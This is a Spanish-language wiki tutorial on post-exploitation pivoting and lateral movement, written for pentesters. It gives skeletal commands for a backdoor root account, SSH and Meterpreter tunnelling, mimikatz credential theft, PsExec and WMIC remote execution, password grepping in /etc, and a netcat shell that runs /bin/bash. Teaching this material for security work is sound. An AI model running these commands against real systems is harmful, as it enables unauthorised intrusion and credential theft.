[[hack_roadmap-0|Up]]
====== Técnicas de Pivoting y Movimiento Lateral ======
El pivoting y el movimiento lateral son técnicas avanzadas de post-explotación
utilizadas por pentesters y atacantes para expandir su acceso dentro de una red
comprometida. El objetivo es moverse desde un sistema inicialmente comprometido
a otros sistemas dentro de la misma red, elevando así el nivel de compromiso y
el impacto del ataque.
===== Introducción al Pivoting y Movimiento Lateral =====
==== Conceptos Clave: ====
* **Pivoting:** Uso de un sistema comprometido como punto de partida para atacar otros sistemas dentro de la red.
* **Movimiento Lateral:** Técnica para moverse de un sistema a otro dentro de una red, a menudo utilizando credenciales comprometidas o vulnerabilidades adicionales.
==== Recursos: ====
* [[https://owasp.org/www-project-web-security-testing-guide/|OWASP Testing Guide]]
* [[https://attack.mitre.org/|MITRE ATT&CK Framework]]
===== Preparación para Pivoting =====
==== Establecimiento de una Sesión Persistente: ====
* Mantener acceso continuo al sistema comprometido mediante la creación de usuarios persistentes o instalando backdoors.
useradd -ou 0 -g 0
passwd
==== Configuración de Túneles: ====
* Configurar túneles para redirigir el tráfico a través del sistema comprometido.
ssh -D 1080 user@compromised_host
==== Uso de Herramientas de Pivoting: ====
**Metasploit:** Usar el módulo ''meterpreter'' para configurar pivoting.
meterpreter > run autoroute -s
meterpreter > run portfwd add -l -p -r
==== Recursos: ====
* [[https://www.offensive-security.com/metasploit-unleashed/pivoting/|Metasploit Unleashed: Pivoting]]
===== Movimiento Lateral en Sistemas Windows =====
==== Enumeración de la Red y Recursos: ====
Utilizar herramientas para descubrir otros hosts y servicios en la red.
net view
nbtstat -A
==== Robo de Credenciales: ====
Obtener credenciales mediante técnicas como ''Pass-the-Hash'',
''Pass-the-Ticket'', o ''Dumping SAM''.
mimikatz
==== Uso de Herramientas de Movimiento Lateral: ====
**PsExec:** Ejecutar comandos en sistemas remotos utilizando credenciales
válidas.
PsExec.exe \\target_ip -u username -p password cmd
* **WMIC (Windows Management Instrumentation Command-line):**
wmic /node: /user: /password: process call create "cmd.exe /c "
==== Recursos: ====
* [[https://github.com/gentilkiwi/mimikatz|Mimikatz GitHub]]
* [[https://docs.microsoft.com/en-us/sysinternals/downloads/psexec|Sysinternals PsExec]]
===== Movimiento Lateral en Sistemas Linux =====
==== Enumeración de la Red y Recursos: ====
Utilizar herramientas de enumeración para descubrir otros hosts y servicios.
nmap -sP 192.168.1.0/24
==== Robo de Credenciales: ====
Capturar credenciales desde archivos de configuración y memoria.
cat /etc/passwd
grep -i password /etc/*
==== Uso de Herramientas de Movimiento Lateral: ====
**SSH (Secure Shell):** Usar credenciales comprometidas para moverse
lateralmente.
ssh user@target_ip
**Netcat (nc):** Transferir y ejecutar scripts en sistemas remotos.
nc -lvp -e /bin/bash
==== Recursos: ====
* [[https://hackertarget.com/netcat-cheat-sheet/|Netcat Cheat Sheet]]
===== Herramientas Avanzadas para Pivoting y Movimiento Lateral =====
==== Metasploit Framework: ====
Usar módulos de Metasploit para automatizar pivoting y movimiento lateral.
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS
run
==== Cobalt Strike: ====
Plataforma avanzada para operaciones de pentesting y red teaming.
==== BloodHound: ====
Herramienta para mapear relaciones y privilegios en redes Active Directory.
neo4j console
==== Recursos: ====
* [[https://www.cobaltstrike.com/help|Cobalt Strike Documentation]]
* [[https://bloodhound.readthedocs.io/en/latest/|BloodHound Documentation]]
===== Ejemplo de Escenario de Pivoting y Movimiento Lateral =====
==== Compromiso Inicial: ====
Comprometer un host utilizando un exploit o credenciales robadas.
==== Configuración de Pivoting: ====
Establecer un túnel SSH para redirigir el tráfico a través del host
comprometido.
ssh -D 1080 user@compromised_host
==== Movimiento Lateral: ====
Utilizar herramientas como PsExec o SSH para moverse a otros hosts.
PsExec.exe \\target_ip -u username -p password cmd
==== Compromiso Adicional: ====
Repetir el proceso para comprometer más sistemas y expandir el acceso en la
red.
====== Conclusión ======
El pivoting y el movimiento lateral son técnicas avanzadas que permiten a los
atacantes expandir su acceso dentro de una red comprometida. Al dominar estas
técnicas, los profesionales de seguridad pueden identificar y mitigar las rutas
de ataque utilizadas por los atacantes para moverse dentro de la red. Es crucial
realizar estas actividades de manera ética y con el permiso adecuado, utilizando
el conocimiento adquirido para fortalecer la seguridad de los sistemas y
proteger contra ataques maliciosos.
===== Recursos Adicionales =====
* [[https://www.cybrary.it/course/pivoting-and-lateral-movement/|Pivoting and Lateral Movement]] (Cybrary)